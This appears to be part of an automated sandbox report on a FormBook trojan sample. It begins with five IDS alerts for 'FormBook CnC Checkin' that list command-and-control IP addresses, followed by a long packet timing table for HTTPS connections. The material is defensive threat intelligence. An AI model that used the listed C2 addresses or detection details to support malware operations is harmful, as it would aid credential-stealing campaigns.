                                                                                                                                                                                192.168.11.2076.223.26.9649939802031412 08/23/23-09:33:28.092219TCP2031412ET TROJAN FormBook CnC Checkin (GET)4993980192.168.11.2076.223.26.96
                                                                                                                                                                                192.168.11.20104.21.6.5749931802031412 08/23/23-09:30:23.778246TCP2031412ET TROJAN FormBook CnC Checkin (GET)4993180192.168.11.20104.21.6.57
                                                                                                                                                                                192.168.11.2034.102.136.18049933802031412 08/23/23-09:31:04.844971TCP2031412ET TROJAN FormBook CnC Checkin (GET)4993380192.168.11.2034.102.136.180
                                                                                                                                                                                192.168.11.2018.225.33.21049946802031412 08/23/23-09:36:12.408484TCP2031412ET TROJAN FormBook CnC Checkin (GET)4994680192.168.11.2018.225.33.210
                                                                                                                                                                                192.168.11.20203.161.56.23749945802031412 08/23/23-09:35:51.426849TCP2031412ET TROJAN FormBook CnC Checkin (GET)4994580192.168.11.20203.161.56.237

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Aug 23, 2023 09:28:57.935029030 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:57.935141087 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:57.935350895 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:57.961819887 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:57.961849928 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.019853115 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.020128965 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:58.022654057 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.022921085 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:58.022921085 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:58.094856977 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:58.094891071 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.095537901 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.095748901 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:58.098608017 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:58.140064001 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.488620043 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.488847017 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:58.488853931 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.489037991 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:58.490457058 CEST49921443192.168.11.20142.250.185.110
                                                                                                                                                                                Aug 23, 2023 09:28:58.490525961 CEST44349921142.250.185.110192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.628153086 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.628177881 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.628397942 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.628700972 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.628710985 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.697005987 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.697226048 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.697226048 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.699050903 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.699352026 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.703293085 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.703314066 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.703823090 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.703986883 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.704261065 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.748085022 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.963507891 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.963896036 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.963944912 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.963978052 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.964241982 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.964847088 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.965178967 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.966753006 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.967118025 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.967628002 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.967808008 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.967808008 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.968525887 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.968782902 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.968831062 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.968972921 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.969269037 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.969579935 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.969630957 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.969800949 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.976223946 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.976445913 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.976501942 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.976732016 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.976773977 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.976933002 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.976978064 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.977231026 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.977463007 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.977668047 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.977720976 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.977893114 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.978246927 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.978523016 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.978574991 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.978893995 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.979263067 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.979612112 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.979665041 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.979871035 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.980170012 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.980452061 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.980503082 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.980720997 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.981019974 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.981313944 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.981368065 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.981678009 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.981863022 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.982120991 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.982172012 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.982430935 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.982786894 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.983097076 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.983304977 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.983467102 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.983530045 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.983731031 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.984195948 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.984431982 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.984483957 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.984743118 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.985033035 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.985239983 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.985246897 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.985300064 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.985460043 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.985747099 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.986002922 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.986076117 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.986355066 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.986519098 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.986676931 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.986742973 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.986954927 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.987364054 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.987588882 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.987647057 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.987934113 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.988076925 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.988279104 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.988318920 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.988512993 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.988775969 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.989012003 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.989064932 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.989248991 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.989604950 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.989861965 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.989916086 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.990112066 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.990358114 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.990561962 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.990619898 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.990864992 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.990926027 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.991146088 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.991151094 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.991221905 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.991300106 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.991350889 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.991491079 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.991527081 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.991549969 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.991667986 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.992152929 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.992332935 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.992369890 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.992393970 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.992587090 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.992633104 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.992788076 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.993129015 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.993345022 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.993385077 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.993458033 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.993500948 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.993673086 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.993700027 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.993839979 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.993937016 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.994153976 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.994180918 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.994206905 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.994467974 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.994523048 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.994772911 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.994950056 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.995120049 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.995172024 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.995312929 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.995382071 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.995419025 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.995502949 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.995568991 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.995990992 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.996149063 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.996218920 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.996459007 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.996460915 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.996515036 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.996678114 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.996709108 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.996859074 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.996943951 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.997098923 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.997148991 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.997325897 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.997351885 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.997390985 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.997484922 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.997560024 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.997894049 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.998055935 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.998105049 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.998220921 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.998331070 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.998374939 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.998404026 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.998521090 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.998543978 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.998754025 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.999166965 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.999334097 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.999370098 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.999396086 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.999617100 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:58.999675035 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.999891043 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.000483990 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.000653982 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.000725031 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.000952959 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.014148951 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.014327049 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.014389992 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.014530897 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.014624119 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.014645100 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.014694929 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.014724970 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.014858007 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.014858961 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.014893055 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.014950037 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.015084982 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.015155077 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.015201092 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.015239954 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.015439034 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.015497923 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.015546083 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.015592098 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.015676975 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.015688896 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.015690088 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.015749931 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.015856028 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.015901089 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.015932083 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.015964031 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.016047955 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.016153097 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.016189098 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.016221046 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.016321898 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.016355038 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.016412020 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.016463041 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.016544104 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.016577005 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.016618013 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.016649961 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.016722918 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.016824007 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.016880989 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.016918898 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.016969919 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.017021894 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.017076015 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.017117023 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.017277002 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.017280102 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.017328024 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.017363071 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.017398119 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.017437935 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.017524004 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.017611027 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.017631054 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.017652988 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.017683983 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.017786980 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.017827034 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.017963886 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.018016100 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.018066883 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.018115997 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.018230915 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.018284082 CEST49922443192.168.11.20172.217.18.97
